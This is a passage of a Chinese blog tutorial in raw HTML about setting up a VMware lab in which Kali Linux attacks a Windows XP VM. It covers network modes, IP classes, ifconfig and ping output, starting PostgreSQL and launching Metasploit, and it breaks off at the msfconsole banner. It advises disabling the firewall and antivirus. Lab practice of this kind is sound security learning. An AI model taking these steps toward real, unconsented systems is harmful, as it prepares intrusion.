border-right: none; border-bottom: none; border-left: 3px solid rgb(226, 223, 223); border-image: initial; color: rgb(51, 51, 51); min-height: 35px; line-height: 1.6;"><p style="margin: 10px auto; text-align: justify;">与物理交换机相似,虚拟交换机也能将网络连接组件连接在一起。虚拟交换机又称为虚拟网络,其名称为VMnet0、VMnet1、VMnet2,以此类推。有少量虚拟交换机会默认映射到特定网络。</p></blockquote><div class="image-package"><div class="image-container"><div class="image-container-fill">&nbsp;</div><div class="image-view" data-width="1132" data-height="443"><img src="https://upload-images.jianshu.io/upload_images/4976516-434a9bb2eec0fe53.jpg" alt="" data-original-src="//upload-images.jianshu.io/upload_images/4976516-434a9bb2eec0fe53.jpg" data-original-width="1132" data-original-height="443" data-original-format="image/jpeg" data-original-filesize="107024" class="medium-zoom-image" style="border: 0px; max-width: 660px; cursor: zoom-in; height: auto; width: auto; max-height: 100%; transition: transform 0.3s cubic-bezier(0.2, 0, 0.2, 1) 0s !important;"></div></div><div class="image-caption">虚拟网络适配器模型.jpg</div></div><div class="image-package"><div class="image-container"><div class="image-container-fill">&nbsp;</div><div class="image-view" data-width="828" data-height="231"><img src="https://upload-images.jianshu.io/upload_images/4976516-d874d4f1c05ccac9.jpg" alt="" data-original-src="//upload-images.jianshu.io/upload_images/4976516-d874d4f1c05ccac9.jpg" data-original-width="828" data-original-height="231" data-original-format="image/jpeg" data-original-filesize="22919" class="medium-zoom-image" style="border: 0px; max-width: 660px; cursor: zoom-in; height: auto; width: auto; max-height: 100%; transition: transform 0.3s cubic-bezier(0.2, 0, 0.2, 1) 0s !important;"></div></div><div class="image-caption">虚拟网络交换机.jpg</div></div><blockquote style="margin-top: 10px; margin-bottom: 10px; padding: 5px 15px; background: none; border-top: none; border-right: none; border-bottom: none; border-left: 3px solid rgb(226, 223, 223); border-image: initial; color: rgb(51, 51, 51); min-height: 35px; line-height: 1.6;"><p style="margin: 10px auto; text-align: justify;"><strong>桥接模式网络连接</strong><br>桥接模式网络连接通过使用主机系统上的网络适配器将虚拟机连接到网络</p></blockquote><div class="image-package"><div class="image-container"><div class="image-container-fill">&nbsp;</div><div class="image-view" data-width="1084" data-height="437"><img src="https://upload-images.jianshu.io/upload_images/4976516-31597c4560033baa.jpg" alt="" data-original-src="//upload-images.jianshu.io/upload_images/4976516-31597c4560033baa.jpg" data-original-width="1084" data-original-height="437" data-original-format="image/jpeg" data-original-filesize="35206" class="medium-zoom-image" style="border: 0px; max-width: 660px; cursor: zoom-in; height: auto; width: auto; max-height: 100%; transition: transform 0.3s cubic-bezier(0.2, 0, 0.2, 1) 0s !important;"></div></div><div class="image-caption">桥接.jpg</div></div><blockquote style="margin-top: 10px; margin-bottom: 10px; padding: 5px 15px; background: none; border-top: none; border-right: none; border-bottom: none; border-left: 3px solid rgb(226, 223, 223); border-image: initial; color: rgb(51, 51, 51); min-height: 35px; line-height: 1.6;"><p style="margin: 10px auto; text-align: justify;"><strong>NAT 模式网络连接</strong><br>使用 NAT 模式网络时,虚拟机在外部网络中不必具有自己的 IP 地址。主机系统上会建立单独的专用网络。</p></blockquote><div class="image-package"><div class="image-container"><div class="image-container-fill">&nbsp;</div><div class="image-view" data-width="889" data-height="406"><img src="https://upload-images.jianshu.io/upload_images/4976516-bacf81b8b7c10cf9.jpg" alt="" data-original-src="//upload-images.jianshu.io/upload_images/4976516-bacf81b8b7c10cf9.jpg" data-original-width="889" data-original-height="406" data-original-format="image/jpeg" data-original-filesize="35154" class="medium-zoom-image" style="border: 0px; max-width: 660px; cursor: zoom-in; height: auto; width: auto; max-height: 100%; transition: transform 0.3s cubic-bezier(0.2, 0, 0.2, 1) 0s !important;"></div></div><div class="image-caption">NAT网络.jpg</div></div><blockquote style="margin-top: 10px; margin-bottom: 10px; padding: 5px 15px; background: none; border-top: none; border-right: none; border-bottom: none; border-left: 3px solid rgb(226, 223, 223); border-image: initial; color: rgb(51, 51, 51); min-height: 35px; line-height: 1.6;"><p style="margin: 10px auto; text-align: justify;"><strong>仅主机模式网络连接</strong><br>仅主机模式网络连接可创建完全包含在主机中的网络。</p></blockquote><p style="margin: 10px auto; text-align: justify;">&nbsp;</p><div class="image-package"><div class="image-container"><div class="image-container-fill">&nbsp;</div><div class="image-view" data-width="881" data-height="417"><img src="https://upload-images.jianshu.io/upload_images/4976516-539fc7825d5519a6.jpg" alt="" data-original-src="//upload-images.jianshu.io/upload_images/4976516-539fc7825d5519a6.jpg" data-original-width="881" data-original-height="417" data-original-format="image/jpeg" data-original-filesize="37627" class="medium-zoom-image" style="border: 0px; max-width: 660px; cursor: zoom-in; height: auto; width: auto; max-height: 100%; transition: transform 0.3s cubic-bezier(0.2, 0, 0.2, 1) 0s !important;"></div></div><div class="image-caption">主机模式.jpg</div></div><br>2.2&nbsp;<strong>IP(这里是ipv4)地址分类,网络类型。</strong><p style="margin: 10px auto; text-align: justify;">&nbsp;</p><blockquote style="margin-top: 10px; margin-bottom: 10px; padding: 5px 15px; background: none; border-top: none; border-right: none; border-bottom: none; border-left: 3px solid rgb(226, 223, 223); border-image: initial; color: rgb(51, 51, 51); min-height: 35px; line-height: 1.6;"><p style="margin: 10px auto; text-align: justify;"><strong>ip地址,由《net-id,host-id》二部分组成。根据网络号的位数,把ip划分为A,B,C,D,E几大类,其中A类(0,127),B类(128,191),C类(192,223)</strong></p></blockquote><p style="margin: 10px auto; text-align: justify;">3.0&nbsp;<a href="https://link.jianshu.com/?t=https://jingyan.baidu.com/article/3f16e003cd0a0d2591c103b4.html" rel="nofollow" target="_blank" style="color: rgb(0, 0, 0);">VMWare虚拟机提供的桥接、nat和主机模式的区别</a></p><blockquote style="margin-top: 10px; margin-bottom: 10px; padding: 5px 15px; background: none; border-top: none; border-right: none; border-bottom: none; border-left: 3px solid rgb(226, 223, 223); border-image: initial; color: rgb(51, 51, 51); min-height: 35px; line-height: 1.6;"><p style="margin: 10px auto; text-align: justify;">所以本次试验的虚拟机网络采用<strong>桥接方式</strong>,所以主要介绍下桥接。<br><br><strong>bridged</strong>(桥接模式)<br>在这种模式下,VMWare虚拟出来的操作系统就像是局域网中的一台独立的主机,它可以访问网内任何一台机器。<br>在桥接模式下,因为是独立的主机系统,那么就需要为虚拟系统配置IP、子网掩码。<br>使用桥接模式的虚拟系统和宿主机器的关系,就像连接在同一个Hub上的两台电脑。想让它们相互通讯,你就需要为虚拟系统配置IP地址和子网掩码,否则就无法通信。<strong>而且还要和宿主机器处于同一网段,这样虚拟系统才能和宿主机器进行通信。</strong></p></blockquote><p style="margin: 10px auto; text-align: justify;">&nbsp;</p><hr><p style="margin: 10px auto; text-align: justify;">&nbsp;</p><h3 style="margin-top: 10px; margin-bottom: 10px; font-size: 16px; color: rgb(3, 120, 187); line-height: 2.5em;">重要细节</h3><p style="margin: 10px auto; text-align: justify;">1.0&nbsp;<strong>因为在vmware模拟kaili入侵windows xp所以要保证这二台虚拟机可以通信,试验的vmware采用桥接网络,二台虚拟机相当于独立的主机,在vmware想要通信,必须处于同一网段(就是网络号要一样),二台主机设置kaili设置为192.168.201.133,windows xp设置为192.168.201.135,它们是C类ip,前3位是网络号,都是192.168.201相同,可以通信,可以采用ping命令进行。</strong><br>2.0&nbsp;<strong>为了试验效果明显,最好关闭掉windows的防火墙,这样入侵更容易,而且自己原本的主机把杀毒软件也关闭了。</strong><br></p><hr><p style="margin: 10px auto; text-align: justify;">&nbsp;</p><h3 style="margin-top: 10px; margin-bottom: 10px; font-size: 16px; color: rgb(3, 120, 187); line-height: 2.5em;">入侵开始</h3><p style="margin: 10px auto; text-align: justify;"><strong>1.0 查看linux的ip地址</strong></p><pre class="hljs ruby" highlighted="true" style="padding: 5px; transition-duration: 0.2s; transition-property: color, opacity; overflow: auto; background: rgb(245, 245, 245); font-family: &quot;Courier New&quot;, sans-serif; border: 1px solid rgb(204, 204, 204); border-radius: 3px;"><code class="ruby hljs" style="margin-right: 3px; margin-left: 3px; padding: 5px; font-family: &quot;Courier New&quot;, sans-serif; background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; border: 1px solid rgb(204, 204, 204); font-size: 14px; transition-duration: 0.2s; transition-property: color, opacity, border-color; display: block; border-radius: 3px; overflow-x: auto;">root@kali<span class="hljs-symbol" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 176, 232);">:~</span><span class="hljs-comment" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 128, 0);"># ifconfig</span>
<span class="hljs-symbol" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 176, 232);">eth0:</span> flags=<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">4163</span>&lt;UP,BROADCAST,RUNNING,MULTICAST&gt;mtu <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">1500</span>
      inet <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">192.168</span>.<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">201.133</span>netmask <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">255.255</span>.<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">255.0</span>broadcast <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">192.168</span>.<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">201.255</span>
      inet6 fe80::<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">20</span><span class="hljs-symbol" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 176, 232);">c:</span><span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">29</span><span class="hljs-symbol" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 176, 232);">ff:</span><span class="hljs-symbol" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 176, 232);">fecc:</span><span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">87</span>cfprefixlen <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">64</span>scopeid <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0x20</span>&lt;link&gt;
      ether <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">00</span><span class="hljs-symbol" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 176, 232);">:</span>0<span class="hljs-symbol" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 176, 232);">c:</span><span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">29</span><span class="hljs-symbol" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 176, 232);">:cc</span><span class="hljs-symbol" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 176, 232);">:</span><span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">87</span><span class="hljs-symbol" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 176, 232);">:cf</span>txqueuelen <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">1000</span>(Ethernet)
      RX packets <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">30</span>bytes <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">2530</span> (<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">2.4</span> KiB)
      RX errors <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span>dropped <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">5</span>overruns <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span>frame <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span>
      TX packets <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">51</span>bytes <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">3303</span> (<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">3.2</span> KiB)
      TX errors <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span>dropped <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span> overruns <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span>carrier <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span>collisions <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span>

<span class="hljs-symbol" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 176, 232);">lo:</span> flags=<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">73</span>&lt;UP,LOOPBACK,RUNNING&gt;mtu <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">65536</span>
      inet <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">127.0</span>.<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span>.<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">1</span>netmask <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">255.0</span>.<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span>.<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span>
      inet6 <span class="hljs-symbol" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 176, 232);">:</span><span class="hljs-symbol" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 176, 232);">:</span><span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">1</span>prefixlen <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">128</span>scopeid <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0x10</span>&lt;host&gt;
      looptxqueuelen <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">1000</span>(Local Loopback)
      RX packets <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">52</span>bytes <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">3756</span> (<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">3.6</span> KiB)
      RX errors <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span>dropped <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span>overruns <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span>frame <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span>
      TX packets <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">52</span>bytes <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">3756</span> (<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">3.6</span> KiB)
      TX errors <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span>dropped <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span> overruns <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span>carrier <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span>collisions <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span>
</code></pre><blockquote style="margin-top: 10px; margin-bottom: 10px; padding: 5px 15px; background: none; border-top: none; border-right: none; border-bottom: none; border-left: 3px solid rgb(226, 223, 223); border-image: initial; color: rgb(51, 51, 51); min-height: 35px; line-height: 1.6;"><p style="margin: 10px auto; text-align: justify;"><strong>这里可以看出我的ip地址为192.168.201.133。如果想要修改ip地址可以采用 ifconfig eth0 192.168.201.136 命令</strong><br><br><strong>其中127.0.0.1 127.0.0.1是<a href="https://link.jianshu.com/?t=https://baike.baidu.com/item/%E5%9B%9E%E9%80%81%E5%9C%B0%E5%9D%80" rel="nofollow" target="_blank" style="color: rgb(0, 0, 0);">回送地址</a>,指本地机,一般用来测试使用。回送地址(127.x.x.x)是本机回送地址(Loopback Address),即<a href="https://link.jianshu.com/?t=https://baike.baidu.com/item/%E4%B8%BB%E6%9C%BA" rel="nofollow" target="_blank" style="color: rgb(0, 0, 0);">主机</a>IP<a href="https://link.jianshu.com/?t=https://baike.baidu.com/item/%E5%A0%86%E6%A0%88" rel="nofollow" target="_blank" style="color: rgb(0, 0, 0);">堆栈</a>内部的IP地址,主要用于网络软件测试以及本地机<a href="https://link.jianshu.com/?t=https://baike.baidu.com/item/%E8%BF%9B%E7%A8%8B%E9%97%B4%E9%80%9A%E4%BF%A1" rel="nofollow" target="_blank" style="color: rgb(0, 0, 0);">进程间通信</a>,无论什么程序,一旦使用回送地址发送数据,协议软件立即返回,不进行任何网络传输。</strong></p></blockquote><p style="margin: 10px auto; text-align: justify;"><strong>2.0 ping命令,测试linux和windows是否可以通信</strong></p><pre class="hljs python" highlighted="true" style="padding: 5px; transition-duration: 0.2s; transition-property: color, opacity; overflow: auto; background: rgb(245, 245, 245); font-family: &quot;Courier New&quot;, sans-serif; border: 1px solid rgb(204, 204, 204); border-radius: 3px;"><code class="python hljs" style="margin-right: 3px; margin-left: 3px; padding: 5px; font-family: &quot;Courier New&quot;, sans-serif; background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; border: 1px solid rgb(204, 204, 204); font-size: 14px; transition-duration: 0.2s; transition-property: color, opacity, border-color; display: block; border-radius: 3px; overflow-x: auto;">root@kali:~<span class="hljs-comment" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 128, 0);"># ping -c 2 192.168.201.135</span>
PING <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">192.168</span><span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">.201</span><span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">.135</span> (<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">192.168</span><span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">.201</span><span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">.135</span>) <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">56</span>(<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">84</span>) <span class="hljs-built_in" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">bytes</span> of data.
<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">64</span> <span class="hljs-built_in" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">bytes</span> <span class="hljs-keyword" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">from</span> <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">192.168</span><span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">.201</span><span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">.135</span>: icmp_seq=<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">1</span> ttl=<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">128</span> time=<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">13.5</span> ms
<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">64</span> <span class="hljs-built_in" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">bytes</span> <span class="hljs-keyword" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">from</span> <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">192.168</span><span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">.201</span><span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">.135</span>: icmp_seq=<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">2</span> ttl=<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">128</span> time=<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0.395</span> ms

--- <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">192.168</span><span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">.201</span><span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">.135</span> ping statistics ---
<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">2</span> packets transmitted, <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">2</span> received, <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span>% packet loss, time <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">1002</span>ms
rtt <span class="hljs-built_in" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">min</span>/avg/<span class="hljs-built_in" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">max</span>/mdev = <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0.395</span>/<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">6.986</span>/<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">13.578</span>/<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">6.592</span> ms

</code></pre><p style="margin: 10px auto; text-align: justify;"><strong>linux的ping和windows有所不同,如果不设置次数会一直ping下</strong>去。</p><pre class="hljs ruby" highlighted="true" style="padding: 5px; transition-duration: 0.2s; transition-property: color, opacity; overflow: auto; background: rgb(245, 245, 245); font-family: &quot;Courier New&quot;, sans-serif; border: 1px solid rgb(204, 204, 204); border-radius: 3px;"><code class="ruby hljs" style="margin-right: 3px; margin-left: 3px; padding: 5px; font-family: &quot;Courier New&quot;, sans-serif; background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; border: 1px solid rgb(204, 204, 204); font-size: 14px; transition-duration: 0.2s; transition-property: color, opacity, border-color; display: block; border-radius: 3px; overflow-x: auto;">root@kali<span class="hljs-symbol" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 176, 232);">:~</span><span class="hljs-comment" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 128, 0);"># ping</span>
<span class="hljs-symbol" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 176, 232);">Usage:</span> ping [-aAbBdDfhLnOqrRUvV64] [-c count] [-i interval] [-I interface]
            [-m mark] [-M pmtudisc_option] [-l preload] [-p pattern] [-Q tos]
            [-s packetsize] [-S sndbuf] [-t ttl] [-T timestamp_option]
            [-w deadline] [-W timeout] destination

</code></pre><p style="margin: 10px auto; text-align: justify;"><strong>3.0 开启SQL数据库服务</strong></p><pre class="hljs ruby" highlighted="true" style="padding: 5px; transition-duration: 0.2s; transition-property: color, opacity; overflow: auto; background: rgb(245, 245, 245); font-family: &quot;Courier New&quot;, sans-serif; border: 1px solid rgb(204, 204, 204); border-radius: 3px;"><code class="ruby hljs" style="margin-right: 3px; margin-left: 3px; padding: 5px; font-family: &quot;Courier New&quot;, sans-serif; background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; border: 1px solid rgb(204, 204, 204); font-size: 14px; transition-duration: 0.2s; transition-property: color, opacity, border-color; display: block; border-radius: 3px; overflow-x: auto;">root@kali<span class="hljs-symbol" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 176, 232);">:~</span><span class="hljs-comment" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 128, 0);"># service postgresql start </span>
</code></pre><p style="margin: 10px auto; text-align: justify;"><strong>4.0 终端执行msfconsole 命令</strong></p><pre class="hljs ruby" highlighted="true" style="padding: 5px; transition-duration: 0.2s; transition-property: color, opacity; overflow: auto; background: rgb(245, 245, 245); font-family: &quot;Courier New&quot;, sans-serif; border: 1px solid rgb(204, 204, 204); border-radius: 3px;"><code class="ruby hljs" style="margin-right: 3px; margin-left: 3px; padding: 5px; font-family: &quot;Courier New&quot;, sans-serif; background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; border: 1px solid rgb(204, 204, 204); font-size: 14px; transition-duration: 0.2s; transition-property: color, opacity, border-color; display: block; border-radius: 3px; overflow-x: auto;">root@kali<span class="hljs-symbol" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 176, 232);">:~</span><span class="hljs-comment" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 128, 0);"># msfconsole </span>
                                                
<span class="hljs-comment" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 128, 0);"># cowsay++</span>
___________<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">_</span>
&lt; metasploit &gt;
------------
       \   ,_<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">_</span>,
      \(oo)___<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">_</span>
         (_<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">_</span>)    )\
